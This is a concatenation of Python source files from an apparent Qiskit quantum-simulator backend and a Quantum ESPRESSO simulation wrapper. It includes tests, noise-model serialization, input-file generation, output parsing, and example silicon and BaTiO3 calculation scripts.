zquantum.core.measurement.ExpectationValues: the expectation values
of each term in the operator
"""
self.num_circuits_run += 1
self.num_jobs_run += 1
wavefunction = self.get_wavefunction(circuit)
# Pyquil does not support PauliSums with no terms.
if len(qubit_operator.terms) == 0:
return ExpectationValues(np.zeros((0,)))
values = []
for op in qubit_operator:
values.append(expectation(op, wavefunction))
return expectation_values_to_real(ExpectationValues(np.asarray(values)))
def get_expectation_values_for_circuitset(self, circuitset, operator, **kwargs):
"""Run a set of circuits and measure the expectation values with respect to a
given operator.
Args:
circuitset (list of zquantum.core.circuit.Circuit objects): the circuits to prepare the states
operator (openfermion.ops.IsingOperator or openfermion.ops.QubitOperator): the operator to measure
Returns:
list of zquantum.core.measurement.ExpectationValues objects: a list of the expectation values of each
term in the operator with respect to the various state preparation circuits
"""
self.num_circuits_run += len(circuitset)
self.num_jobs_run += 1
operator = change_operator_type(operator, IsingOperator)
measurements_set = self.run_circuitset_and_measure(circuitset)
expectation_values_set = []
for measurements in measurements_set:
expectation_values = measurements.get_expectation_values(operator)
expectation_values = expectation_values_to_real(expectation_values)
expectation_values_set.append(expectation_values)
return expectation_values_set
def get_wavefunction(self, circuit):
"""Run a circuit and get the wavefunction of the resulting statevector.
Args:
circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
Returns:
pyquil.wavefunction.Wavefunction
"""
self.num_circuits_run += 1
self.num_jobs_run += 1
ibmq_circuit = circuit.to_qiskit()
coupling_map = None
if self.device_connectivity is not None:
coupling_map = CouplingMap(self.device_connectivity.connectivity)
# Execute job to get wavefunction
job = execute(
ibmq_circuit,
self.device,
noise_model=self.noise_model,
coupling_map=coupling_map,
basis_gates=self.basis_gates,
)
wavefunction = job.result().get_statevector(ibmq_circuit, decimals=20)
return Wavefunction(wavefunction)
--- FILE SEPARATOR ---
import pytest
import numpy as np
import os
from pyquil import Program
from pyquil.gates import H, CNOT, RX, CZ, X
from openfermion.ops import QubitOperator
import qiskit.providers.aer.noise as AerNoise
from zquantum.core.circuit import Circuit
from zquantum.core.interfaces.backend_test import QuantumSimulatorTests
from zquantum.core.measurement import ExpectationValues
from ..simulator import QiskitSimulator
from ..noise import get_qiskit_noise_model
@pytest.fixture(
params=[
{
"device_name": "qasm_simulator",
"n_samples": 1,
"api_token": os.getenv("ZAPATA_IBMQ_API_TOKEN"),
},
]
)
def backend(request):
return QiskitSimulator(**request.param)
@pytest.fixture(
params=[
{
"device_name": "statevector_simulator",
},
]
)
def wf_simulator(request):
return QiskitSimulator(**request.param)
@pytest.fixture(
params=[
{
"device_name": "qasm_simulator",
},
]
)
def sampling_simulator(request):
return QiskitSimulator(**request.param)
@pytest.fixture(
params=[
{"device_name": "qasm_simulator", "n_samples": 1000, "optimization_level": 0},
]
)
def noisy_simulator(request):
ibmq_api_token = os.getenv("ZAPATA_IBMQ_API_TOKEN")
noise_model, connectivity = get_qiskit_noise_model(
"ibmqx2", api_token=ibmq_api_token
)
return QiskitSimulator(
**request.param, noise_model=noise_model, device_connectivity=connectivity
)
class TestQiskitSimulator(QuantumSimulatorTests):
def test_run_circuitset_and_measure(self, sampling_simulator):
# Given
circuit = Circuit(Program(X(0), CNOT(1, 2)))
# When
sampling_simulator.n_samples = 100
measurements_set = sampling_simulator.run_circuitset_and_measure([circuit])
# Then
assert len(measurements_set) == 1
for measurements in measurements_set:
assert len(measurements.bitstrings) == 100
assert all(bitstring == (1, 0, 0) for bitstring in measurements.bitstrings)
# Given
circuit = Circuit(Program(X(0), CNOT(1, 2)))
# When
sampling_simulator.n_samples = 100
measurements_set = sampling_simulator.run_circuitset_and_measure(
[circuit] * 100
)
# Then
assert len(measurements_set) == 100
for measurements in measurements_set:
assert len(measurements.bitstrings) == 100
assert all(bitstring == (1, 0, 0) for bitstring in measurements.bitstrings)
def test_setup_basic_simulators(self):
simulator = QiskitSimulator("qasm_simulator")
assert isinstance(simulator, QiskitSimulator)
assert simulator.device_name == "qasm_simulator"
assert simulator.n_samples is None
assert simulator.noise_model is None
assert simulator.device_connectivity is None
assert simulator.basis_gates is None
simulator = QiskitSimulator("statevector_simulator")
assert isinstance(simulator, QiskitSimulator)
assert simulator.device_name == "statevector_simulator"
assert simulator.n_samples is None
assert simulator.noise_model is None
assert simulator.device_connectivity is None
assert simulator.basis_gates is None
def test_simulator_that_does_not_exist(self):
# Given/When/Then
with pytest.raises(RuntimeError):
QiskitSimulator("DEVICE DOES NOT EXIST")
def test_expectation_value_with_noisy_simulator(self, noisy_simulator):
# Given
# Initialize in |1> state
circuit = Circuit(Program(X(0)))
# Flip qubit an even number of times to remain in the |1> state, but allow decoherence to take effect
circuit += Circuit(Program([X(0) for _ in range(10)]))
qubit_operator = QubitOperator("Z0")
noisy_simulator.n_samples = 8192
# When
expectation_values_10_gates = noisy_simulator.get_expectation_values(
circuit, qubit_operator
)
# Then
assert isinstance(expectation_values_10_gates, ExpectationValues)
assert len(expectation_values_10_gates.values) == 1
assert expectation_values_10_gates.values[0] > -1
assert expectation_values_10_gates.values[0] < 0.0
assert isinstance(noisy_simulator, QiskitSimulator)
assert noisy_simulator.device_name == "qasm_simulator"
assert noisy_simulator.n_samples == 8192
assert isinstance(noisy_simulator.noise_model, AerNoise.NoiseModel)
assert noisy_simulator.device_connectivity is not None
assert noisy_simulator.basis_gates is not None
# Given
# Initialize in |1> state
circuit = Circuit(Program(X(0)))
# Flip qubit an even number of times to remain in the |1> state, but allow decoherence to take effect
circuit += Circuit(Program([X(0) for _ in range(50)]))
qubit_operator = QubitOperator("Z0")
noisy_simulator.n_samples = 8192
# When
expectation_values_50_gates = noisy_simulator.get_expectation_values(
circuit, qubit_operator
)
# Then
assert isinstance(expectation_values_50_gates, ExpectationValues)
assert len(expectation_values_50_gates.values) == 1
assert expectation_values_50_gates.values[0] > -1
assert expectation_values_50_gates.values[0] < 0.0
assert (
expectation_values_50_gates.values[0]
> expectation_values_10_gates.values[0]
)
assert isinstance(noisy_simulator, QiskitSimulator)
assert noisy_simulator.device_name == "qasm_simulator"
assert noisy_simulator.n_samples == 8192
assert isinstance(noisy_simulator.noise_model, AerNoise.NoiseModel)
assert noisy_simulator.device_connectivity is not None
assert noisy_simulator.basis_gates is not None
def test_optimization_level_of_transpiler(self):
# Given
noise_model, connectivity = get_qiskit_noise_model(
"ibmqx2", api_token=os.getenv("ZAPATA_IBMQ_API_TOKEN")
)
simulator = QiskitSimulator(
"qasm_simulator",
n_samples=8192,
noise_model=noise_model,
device_connectivity=connectivity,
optimization_level=0,
)
qubit_operator = QubitOperator("Z0")
# Initialize in |1> state
circuit = Circuit(Program(X(0)))
# Flip qubit an even number of times to remain in the |1> state, but allow decoherence to take effect
circuit += Circuit(Program([X(0) for _ in range(50)]))
# When
expectation_values_no_compilation = simulator.get_expectation_values(
circuit, qubit_operator
)
simulator.optimization_level = 3
expectation_values_full_compilation = simulator.get_expectation_values(
circuit, qubit_operator
)
# Then
assert (
expectation_values_full_compilation.values[0]
< expectation_values_no_compilation.values[0]
)
--- FILE SEPARATOR ---
import qiskit.providers.aer.noise as AerNoise
import qiskit.quantum_info.operators.channel as Channel
from typing import TextIO
import json
from zquantum.core.utils import SCHEMA_VERSION, convert_array_to_dict, convert_dict_to_array
import numpy as np
def save_qiskit_noise_model(noise_model: AerNoise.NoiseModel, filename: str) -> None:
"""Save a qiskit aer noise model to file
Args:
noise_model (qiskit.providers.aer.noise.NoiseModel): the noise model to be saved
filename (str): the name of the file
"""
data = {
"module_name": "qeqiskit.utils",
"function_name": "load_qiskit_noise_model",
"schema": SCHEMA_VERSION + "-noise-model",
"data": noise_model.to_dict(serializable=True),
}
with open(filename, "w") as f:
f.write(json.dumps(data, indent=2))
def load_qiskit_noise_model(data: dict) -> AerNoise.NoiseModel:
"""Load a qiskit aer noise model object from file
Args:
data (dict): the serialized version of the qiskit noise model
Returns:
(qiskit.providers.aer.noise.NoiseModel): the noise model
"""
return AerNoise.NoiseModel.from_dict(data)
def save_kraus_operators(kraus: dict, filename: str) -> None:
"""Save a kraus operator to file
Args:
kraus (Dict): Has single qubit and two qubit kraus operators
filename (str): the name of the file
"""
for gate in kraus.keys():
for operator_index in range(len(kraus[gate])):
kraus[gate][operator_index] = convert_array_to_dict(kraus[gate][operator_index])
kraus['schema'] = SCHEMA_VERSION +'kraus-dict'
with open(filename, 'w') as f:
f.write(json.dumps(kraus, indent=2))
def load_kraus_operators(file):
"""Load kraus dictionary from a file.
Args:
file (str or file-like object): the name of the file, or a file-like object.
Returns:
dict: the kraus dict.
"""
if isinstance(file, str):
with open(file, 'r') as f:
data = json.load(f)
else:
data = json.load(file)
del data['schema']
for gate in data.keys():
for operator_index in range(len(data[gate])):
data[gate][operator_index] = convert_dict_to_array(data[gate][operator_index])
return data
--- FILE SEPARATOR ---
from zquantum.core.circuit import save_circuit_connectivity
from qeqiskit.utils import save_qiskit_noise_model
from qeqiskit.noise import get_qiskit_noise_model as _get_qiskit_noise_model
def get_qiskit_noise_model(
device_name, hub="ibm-q", group="open", project="main", api_token=None
):
if api_token is "None":
api_token = None
noise_model, device_connectivity = _get_qiskit_noise_model(
device_name,
hub=hub,
group=group,
project=project,
api_token=api_token,
)
save_qiskit_noise_model(noise_model, "noise-model.json")
save_circuit_connectivity(device_connectivity, "device-connectivity.json")
--- FILE SEPARATOR ---
print("Data is as expected")
|
[
"/src/python/qeqiskit/backend/backend.py",
"/src/python/qeqiskit/backend/backend_test.py",
"/src/python/qeqiskit/noise/__init__.py",
"/src/python/qeqiskit/noise/basic.py",
"/src/python/qeqiskit/optimizer/__init__.py",
"/src/python/qeqiskit/optimizer/optimizer.py",
"/src/python/qeqiskit/optimizer/optimizer_test.py",
"/src/python/qeqiskit/simulator/simulator.py",
"/src/python/qeqiskit/simulator/simulator_test.py",
"/src/python/qeqiskit/utils.py",
"/steps/noise.py",
"/testing/v1/data_validation/get-qiskit-noise-model.py"
] |
00mjk/quantum-espresso-wrapper
|
import numpy as np
from osp.core.namespaces import QE
from osp.core.utils import pretty_print
from osp.wrappers.quantumespresso.qe_session import qeSession
# Creates simulation
sim = QE.Simulation()
k = QE.K_POINTS(vector6 = (7, 7, 7, 0, 0, 0), unit = "")
# Creates a cell, the element Silicon, a pseudopotential, two atoms and cell parameters
SiCell = QE.Cell()
Si = QE.Element(name = "Si")
SiPseudo = QE.PSEUDOPOTENTIAL(path = "Si.pbe-n-kjpaw_psl.1.0.0.UPF")
Si1 = QE.Atom()
celldm1 = QE.Celldm1(value = 5.43070, unit = "au")
# Adds pseudopotential and atoms to the element
# Describes element's mass
# Adds atoms and cell parameters to the cell
# Positions the atoms
Si.add(SiPseudo, Si1)
Si.add(QE.Mass(value = 28.085, unit = "amu"))
SiParams = QE.CellParams(tensor2 = [[0.5, 0.5, 0.],
[0.5, 0., 0.5],
[0., 0.5, 0.5]], unit = "")
SiCell.add(Si1, SiParams)
Si1.add(QE.Position(vector = (0, 0, 0), unit = ""))
SiCell.add(celldm1)
# Specifies the values of the cell parameters
# Adds cell and element to simulation
sim.add(SiCell)
sim.add(Si)
sim.add(k)
sim.add(QE.Pressure(value = 100, unit = "kbar"))
sim.add(QE.StressTensor(tensor2 = np.zeros((3, 3)), unit = "kbar"))
root = ""
SiCell.add(QE.Volume(value = 22, unit = "au^3"))
sim.add(QE.TotalEnergy(value = -434, unit = "Ry"))
q = QE.QPoint(vector = (0, 0, 0), unit = "", calculate = True)
sim.add(q)
q.add(QE.Mode(number = 3))
q.add(QE.Mode(number = 2))
q.add(QE.Mode(number = 1))
sim2 = QE.Simulation()
fd = QE.Cell()
sim2.add(fd)
fd.add(QE.Volume(value = 33, unit = "au^3"))
sim2.add(QE.TotalEnergy(value = -432, unit = "Ry"))
with qeSession(root) as session:
# Adds session to wrapper
quantum_espresso_wrapper = QE.QEWrapper(session = session)
# Adds simulation to wrapper
sim = quantum_espresso_wrapper.add(sim)
# pretty_print(sim)
# Creates a qeUtil object and creates an input file based off of the simulation
print("Running calculation...")
# Runs the simulation
# pretty_print(quantum_espresso_wrapper)
# pretty_print(quantum_espresso_wrapper)
quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "scf", root = root)
# quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "bands")
# quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "bands.x", calculation_type = "")
# quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "relax", IONS = {'ion_dynamics': "'bfgs'"})
# quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pw.x", calculation_type = "scf", SYSTEM = {'occupations': "'tetrahedra'"})
# quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "dos.x", calculation_type = "")
quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "pp.x", calculation_type = 9, PLOT = {"output_format": 6})
# quantum_espresso_wrapper.session._run(simulation = [sim, sim2], prefix = 'si', command_type = "ev.x", calculation_type = '1')
# quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "ph.x", calculation_type = "")
# quantum_espresso_wrapper.session._run(simulation = sim, prefix = "si", command_type = "plotband.x", calculation_type = "", params = {'Input file': 'si.bands.dat', 'Emin, Emax': "-6 17", "gnuplot": "gnuplot", "ps": "si.bands.ps", "Efermi": "0", "deltaE": "5 0"})
pretty_print(sim)
# pretty_print(sim2)
# print("Results: ")
# Pretty prints the simulation
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
from aiida import load_profile
from aiida.orm import Code
from aiida.plugins import DataFactory
from aiida.engine import submit
from aiida.orm.nodes.data.upf import get_pseudos_from_structure
from aiida.engine import run
load_profile()
StructureData = DataFactory('structure')
Dict = DataFactory('dict')
KpointsData = DataFactory('array.kpoints')
###############################
# Set your values here
codename = 'Quantum ESPRESSO@mbxp'
pseudo_family = 'pbe-spn-kjpaw_psl'
# These require setting up beforehand
###############################
code = Code.get_from_string(codename)
builder = code.get_builder()
# BaTiO3 cubic structure
alat = 4. # angstrom
cell = [[alat, 0., 0.,],
[0., alat, 0.,],
[0., 0., alat,]]
s = StructureData(cell=cell)
s.append_atom(position=(0., 0., 0.), symbols='Ba')
s.append_atom(position=(alat / 2., alat / 2., alat / 2.), symbols='Ti')
s.append_atom(position=(alat / 2., alat / 2., 0.), symbols='O')
s.append_atom(position=(alat / 2., 0., alat / 2.), symbols='O')
s.append_atom(position=(0., alat / 2., alat / 2.), symbols='O')
parameters = Dict(
dict={
'CONTROL': {
'calculation': 'scf',
'restart_mode': 'from_scratch',
'wf_collect': True,
},
'SYSTEM': {
'ecutwfc': 30.,
'ecutrho': 240.,
},
'ELECTRONS': {
'conv_thr': 1.e-6,
}
}
)
kpoints = KpointsData()
kpoints.set_kpoints_mesh([4, 4, 4])
builder.pseudos = get_pseudos_from_structure(s, pseudo_family)
builder.metadata.options.resources = {'num_machines': 1}
builder.metadata.options.max_wallclock_seconds = 1800
builder.metadata.label = 'My generic title'
builder.metadata.description = 'My generic description'
builder.structure = s
builder.parameters = parameters
builder.kpoints = kpoints
calc = submit(builder)
results = run(builder)
print('created calculation with PK={}'.format(calc.pk))
print(calc.res)
--- FILE SEPARATOR ---
import numpy as np
from osp.core.namespaces import QE
from osp.wrappers.quantumespresso.qe_session import qeSession
from osp.core.utils import pretty_print
sim = QE.Simulation()
root = ""
session = qeSession(root)
quantum_espresso_wrapper = QE.QEWrapper(session = session)
quantum_espresso_wrapper.add(sim)
cell = QE.Cell()
alat = 4.
cellParams = cell.add(QE.CellParams(tensor2 =
[[1., 0., 0.,],
[0., 1., 0.,],
[0., 0., 1.,]], unit = "alat"))
cell.add(QE.Celldm1(value = alat, unit = ""))
O = QE.Element(name = "O")
Ba = QE.Element(name = "Ba")
Ti = QE.Element(name = "Ti")
O.add(QE.Mass(value = 15.999, unit = "amu"))
Ba.add(QE.Mass(value = 137.327, unit = "amu"))
Ti.add(QE.Mass(value = 47.867, unit = "amu"))
O.add(QE.PSEUDOPOTENTIAL(path = "O.pbe-n-kjpaw_psl.1.0.0.UPF"))
Ba.add(QE.PSEUDOPOTENTIAL(path = "Ba.pbe-spn-kjpaw_psl.1.0.0.UPF"))
Ti.add(QE.PSEUDOPOTENTIAL(path = "Ti.pbe-spn-kjpaw_psl.1.0.0.UPF"))
O1 = O.add(QE.Atom())
O2 = O.add(QE.Atom())
O3 = O.add(QE.Atom())
Ba1 = Ba.add(QE.Atom())
Ti1 = Ti.add(QE.Atom())
O1.add(QE.Position(vector = [0.5, 0.5, 0.], unit = ""))
O2.add(QE.Position(vector = [0.5, 0., 0.5], unit = ""))
O3.add(QE.Position(vector = [0., 0.5, 0.5], unit = ""))
Ba1.add(QE.Position(vector = [0., 0., 0.], unit = ""))
Ti1.add(QE.Position(vector = [0.5, 0.5, 0.5], unit = ""))
cell.add(O1, O2, O3, Ba1, Ti1)
kpoints = QE.K_POINTS(vector6 = (4, 4, 4, 0, 0, 0), unit = "automatic")
sim.add(cell, O, Ba, Ti, kpoints)
paramdict = {
'CONTROL': {
'calculation': 'scf',
'restart_mode': 'from_scratch',
'wf_collect': '.true.',
},
'SYSTEM': {
'ecutwfc': 30.,
'ecutrho': 240.,
},
'ELECTRONS': {
'conv_thr': 1.e-6,
}
}
pretty_print(sim)
session._run(simulation = sim, prefix = "BaTiO3", command_type="pw.x", calculation_type="scf", root = root, **paramdict)
pretty_print(sim)
--- FILE SEPARATOR ---
import subprocess
import pexpect
import osp.wrappers.quantumespresso.qe_utils
class SimulationEngine:
def __init__(self, session):
self._session = session
def run(self):
input_file = self._session._qe_utils._file_path_root + self._session._input_file
output_file = self._session._qe_utils._file_path_root + self._session._output_file
# Using pexpect, checks type of parent class. If it's cliUtils, then use params keys as expect
# and send params values. Do not remove wait, otherwise command will not run.
if self._session._qe_utils.__class__.__base__ == osp.wrappers.quantumespresso.qe_utils.cliUtils:
child = pexpect.spawn(self._session._command_type)
for i, j in self._session._qe_utils.params.items():
child.expect(i)
child.sendline(j)
child.wait()
# Runs the command in the usual way
else:
command = [self._session._command_type, "-i", input_file, ">", output_file]
try:
proc = subprocess.run(" ".join(command), capture_output = True, shell = True)
print(" ".join(command))
except:
raise RuntimeError(f"An error occured when running the following command: {command}")
--- FILE SEPARATOR ---
from osp.core.session import SimWrapperSession
from osp.core.namespaces import QE
from osp.wrappers.quantumespresso.qe_engine import SimulationEngine
from osp.wrappers.quantumespresso.qe_utils import qeUtils
import osp.wrappers.quantumespresso.qe_utils
from osp.core.utils import simple_search
class qeSession(SimWrapperSession):
def __init__(self, engine = None, **kwargs):
# Engine and file utils
engine = engine or SimulationEngine(self)
super().__init__(engine, **kwargs)
def __str__(self):
return "Quantum Espresso Wrapper Session"
def _run(self, simulation, prefix, command_type, calculation_type = "", root = "", **kwargs):
self._qe_utils = getattr(osp.wrappers.quantumespresso.qe_utils, f"{command_type[:-2]}Utils")(self, root = root)
self._prefix = prefix
self._command_type = command_type
self._calculation_type = calculation_type
# Sets input and output files
self._input_file = f"{self._prefix}.{self._command_type[:-2]}{self._calculation_type}.in"
self._output_file = f"{self._prefix}.{self._command_type[:-2]}{self._calculation_type}.out"
# Creates input, runs, and updates the cuds structure
self._qe_utils._create_input(simulation, **kwargs)
self._engine.run()
self._qe_utils._update_cuds(simulation)
# Only here for compatibility reasons
def _load_from_backend(self, uids, expired=None):
for uid in uids:
try:
yield self._registry.get(uid)
except KeyError:
yield None
def _apply_added(self, root_obj, buffer):
return super()._apply_added(root_obj, buffer)
def _apply_deleted(self, root_obj, buffer):
return super()._apply_deleted(root_obj, buffer)
def _apply_updated(self, root_obj, buffer):
return super()._apply_updated(root_obj, buffer)
--- FILE SEPARATOR ---
from osp.core.namespaces import QE
from osp.core.utils import simple_search
import numpy as np
class qeUtils():
"""Utilities for reading and writing .in and .out files
"""
def __init__(self, session, root):
"""__init__ function for using any of the following utils
Args:
session (cuds object): the simulation CUDS object
"""
self._session = session
self._file_path_root = root
self.params = {}
def _modify_input(self, sim, **kwargs):
# Update params based on kwargs
for key1, value1 in self.params.items():
for key2, value2 in kwargs.items():
if key1 == key2:
value1.update(value2)
def _create_input(self, sim, **kwargs):
"""Creates input file(s) necessary to perform the calculations
Args:
sim (QE.Simulation or list of QE.Simulations): the simulation on which to perform the calculation.
For calculations that require multiple simulations and aggregate the data (such as ev.x), please provide a list of strings.
**kwargs (dict): used to update the params
"""
# Writes to file based on params and sys
with open(self._file_path_root + self._session._input_file, "w+") as f:
for key1, value1 in self.params.items():
f.write(f"&{key1} \n")
for key2, value2 in value1.items():
if type(value2) == int or type(value2) == float or value2 == ".true." or value2 == ".false.":
f.write(f" {key2} = {value2} \n")
else:
f.write(f" {key2} = '{value2}' \n")
f.write("/\n")
if self._session._command_type == "pw.x" or self._session._command_type == "ph.x": # TODO: find a way to put this in the pwUtils class
for key1, value1 in self.sysinfo.items():
f.write(f"{key1} ")
for i in value1:
f.write(" ".join(str(v) for v in i) + "\n")
def _update_cuds(self, sim):
"""Based off of the structure
Args:
sim (QE.Simulation or list of QE.Simulations): the simulation for which cuds should be updated.
For calculations that require multiple simulations and aggregate the data (such as ev.x), please provide a list of strings.
"""
# Adds the output file that comes standard with most commands to the structure.
sim.add(QE.Outfile(path = self._file_path_root + self._session._output_file))
class pwUtils(qeUtils):
def _create_input(self, sim, **kwargs):
# Simulation parameters
self.params = {
"CONTROL": {
"calculation": f"{self._session._calculation_type}",
"pseudo_dir": ".",
"tprnfor": ".true.",
"tstress": ".true.",
"prefix": f"{self._session._prefix}",
},
"SYSTEM": {
"ibrav": 0,
"ecutwfc": 100,
},
"ELECTRONS": {},
"CELL": {},
"IONS": {}
}
# Information about the system to be simulated
self.sysinfo = {"ATOMIC_SPECIES":[[""]], "ATOMIC_POSITIONS":[["{crystal}"]],"K_POINTS":[["{automatic}"]]}
# Defining a couple useful functions
def _get_count(oclass):
count = 0
for i in simple_search.find_cuds_objects_by_oclass(oclass = oclass, root = sim, rel = QE.HAS_PART):
count +=1
return count
def findo(oclass, depth):
return simple_search.find_cuds_objects_by_oclass(oclass = oclass, root = sim, rel = QE.HAS_PART)
# Add some sysinfo based on cuds
self.params["SYSTEM"]["nat"] = _get_count(oclass = QE.Atom)
self.params["SYSTEM"]["ntyp"] = _get_count(QE.Element)
self.params["SYSTEM"]["celldm(1)"] = float(findo(QE.Celldm1, 2)[0].value)
print(type(self.params["SYSTEM"]["celldm(1)"]))
# Storing atoms so that the same order can be used to update cuds later on
self.atomlist = []
# Adds a bunch of stuff to sysinfo
for element in findo(QE.Element, 1):
self.sysinfo["ATOMIC_SPECIES"].append([element.name, element.get(oclass = QE.Mass)[0].value, element.get(oclass = QE.PSEUDOPOTENTIAL)[0].path])
for atom in findo(QE.Atom, 3):
self.atomlist.append(atom)
self.sysinfo["ATOMIC_POSITIONS"].append([atom.get(oclass = QE.Element, rel = QE.IS_PART_OF)[0].name] + [i for i in atom.get(oclass = QE.Position)[0].vector])
if findo(QE.K_POINTS, 2):
point = findo(QE.K_POINTS, 1)[0]
self.sysinfo["K_POINTS"].append([int(i) for i in point.vector6])
elif findo(QE.K_POINT, 2):
count = 0
for point in findo(QE.K_POINT, 1):
count +=1
self.sysinfo["K_POINTS"].append([i for i in point.vector] + [point.value])
self.sysinfo["K_POINTS"].insert(1, count)
if self.params["SYSTEM"]["ibrav"] == 0:
self.sysinfo["CELL_PARAMETERS"]=[["{alat}"]]
cellparams = findo(QE.CellParams, 2)[0]
for i in cellparams.tensor2:
self.sysinfo["CELL_PARAMETERS"].append([float(j) for j in i])
# Inherits method
super()._modify_input(sim, **kwargs)
super()._create_input(sim, **kwargs)
def _update_cuds(self, sim):
# A variety of functions to update particular aspects of a cuds simulation
def update_total_energy(line):
if line.startswith("!"):
total_energy = float(line.split()[4])
cuds_entity = sim.get(oclass = QE.TotalEnergy)
if cuds_entity:
cuds_entity[0].value = total_energy
cuds_entity[0].unit = "Ry"
else:
sim.add(QE.TotalEnergy(value = total_energy, unit = "Ry"))
def update_pressure(line):
if line.startswith(" Computing"):
try:
pressure = float(lines[i+2].split()[5])
except:
pressure = float(lines[i+4].split()[5])
cuds_entity = sim.get(oclass = QE.Pressure)
if cuds_entity:
cuds_entity[0].value = pressure
cuds_entity[0].unit = "kbar"
else:
sim.add(QE.Pressure(value = pressure, unit = "kbar"))
def update_force(line):
if line.startswith(" atom "):
atom = self.atomlist[int(line.split()[1])-1]
force = [float(line.split()[j]) for j in range(6, 9)]
cuds_entity = atom.get(oclass = QE.Force)
if cuds_entity:
cuds_entity[0].vector = force
cuds_entity[0].unit = "N"
else:
atom.add(QE.Force(vector = force, unit = "N"))
def update_stress_tensor(i, line):
if line.startswith(" Computing"):
try:
stresslines = [lines[i+j] for j in range(3, 6)]
raw_stress_tensor = [float(j) for j in "".join(stresslines).split()]
except:
stresslines = [lines[i+j] for j in range(5, 8)]
raw_stress_tensor = [float(j) for j in "".join(stresslines).split()]
stress_tensor_kbar = np.array(raw_stress_tensor).reshape((3, 6))[:,3:6]
cuds_entity = sim.get(oclass = QE.StressTensor)
if cuds_entity:
cuds_entity[0].tensor2 = stress_tensor_kbar
cuds_entity[0].unit = "kbar"
else:
sim.add(QE.StressTensor(tensor2 = stress_tensor_kbar, unit = "kbar"))
def update_atomic_positions(i, line):
if line.startswith("Begin"):
positionslines = [lines[i+j] for j in range(3, 3+len(self.atomlist))]
for j, line in enumerate(positionslines):
atom = self.atomlist[j]
position = [float(line.split()[k]) for k in range(1, 4)]
cuds_entity = atom.get(oclass = QE.Position)
cuds_entity[0].vector = position
cuds_entity[0].unit = "kbar"
def update_celldm1(line):
if line.startswith("CELL_PARAMETERS"):
celldm1 = float(line.split()[2][:-1])
cuds_entity = sim.get(oclass = QE.Cell)[0].get(oclass = QE.Celldm1)
cuds_entity[0].value = celldm1
cuds_entity[0].unit = "au"
def update_cell_params(i, line):
if line.startswith("CELL_PARAMETERS"):
paramlines = [lines[i+j] for j in range(1, 4)]
cuds_entity = sim.get(oclass = QE.Cell)[0].get(oclass = QE.Cell)[0].get(oclass = QE.CellParams)[0]
cuds_entity.get(oclass = QE.CellParameterX)[0].vector = [float(k) for k in paramlines[0].split()]
cuds_entity.get(oclass = QE.CellParameterY)[0].vector = [float(k) for k in paramlines[1].split()]
cuds_entity.get(oclass = QE.CellParameterZ)[0].vector = [float(k) for k in paramlines[2].split()]
def update_volume(line):
if line.startswith(" unit-cell volume"):
volume = float(line.split()[3])
cuds_entity = sim.get(oclass = QE.Cell)[0].get(oclass = QE.Volume)
if cuds_entity:
cuds_entity[0].value = volume
cuds_entity[0].unit = "au^3"
else:
sim.get(oclass = QE.Cell)[0].add(QE.Volume(value = volume, unit = "au^3"))
# How the cuds simulation should be updated depending on what calculation type
if self._session._calculation_type == "scf":
with open(self._file_path_root + self._session._output_file, "r+") as file:
lines = file.readlines()
for i, line in enumerate(lines):
update_total_energy(line)
update_pressure(line)
update_force(line)
update_stress_tensor(i, line)
update_volume(line)
if self._session._calculation_type == "relax":
with open(self._file_path_root + self._session._output_file, "r+") as file:
lines = file.readlines()
for i, line in enumerate(lines):
update_total_energy(line)
update_pressure(line)
update_force(line)
update_stress_tensor(i, line)
update_atomic_positions(i, line)
update_volume(line)
if self._session._calculation_type == "vc-relax":
with open(self._file_path_root + self._session._output_file, "r+") as file:
lines = file.readlines()
for i, line in enumerate(lines):
update_total_energy(lines)
update_pressure(lines)
update_force(line)
update_stress_tensor(i, line)
update_atomic_positions(i, line)
update_celldm1(i, line)
update_volume(line)
super()._update_cuds(sim)
class bandsUtils(qeUtils):
def _create_input(self, sim, **kwargs):
self.params = {
"BANDS": {
"prefix": f"{self._session._prefix}",
"outdir": ".",
"filband": f"{self._session._prefix}" + ".bands.dat"
}
}
self._session._calculation_type = ""
self.sysinfo = []
super()._modify_input(sim, **kwargs)
super()._create_input(sim, **kwargs)
def _update_cuds(self, sim):
sim.add(QE.BandsDat(path = self._file_path_root + self._session._prefix + ".bands.dat"))
super()._update_cuds(sim)
class dosUtils(qeUtils):
def _create_input(self, sim, **kwargs):
self.params = {
"DOS": {
"outdir": ".",
"prefix": f"{self._session._prefix}",
"DeltaE": 0.05,
"fildos": f"{self._session._prefix}" + ".dos.dat"
}
}
super()._modify_input(sim, **kwargs)
super()._create_input(sim, **kwargs)
def _update_cuds(self, sim):
sim.add(QE.DosDat(path = self._file_path_root + self._session._prefix + ".dos.dat"))
super()._update_cuds(sim)
class ppUtils(qeUtils):
def _create_input(self, sim, **kwargs):
self.params = {
"INPUTPP": {
"prefix": f"{self._session._prefix}",
"outdir": ".",
"filplot": f"{self._session._prefix}.pp{self._session._calculation_type}.txt",
# Note that plot_num is strictly int, reference to the significance of each values can be found here: https://www.quantum-espresso.org/Doc/INPUT_PP.html
# We use calculation type because it is already in use
"plot_num": self._session._calculation_type
},
"PLOT": {
"iflag": 3,
"output_format": 3,
"fileout": f"{self._session._prefix}{self._session._calculation_type}.pp.xsf",
# TODO: add support for manual vectors here
# TODO: add support for variable output formats
}
}
super()._modify_input(sim, **kwargs)
# Default plot settings
if self.params["PLOT"]["iflag"] != 4:
self.params["PLOT"][f"e1 ({1})"] = 1
self.params["PLOT"][f"e1 ({2})"] = 0
self.params["PLOT"][f"e1 ({3})"] = 0
for i in range(1, 4):
self.params["PLOT"][f"x0 ({i})"] = 0
self.params["PLOT"]["nx"] = 101
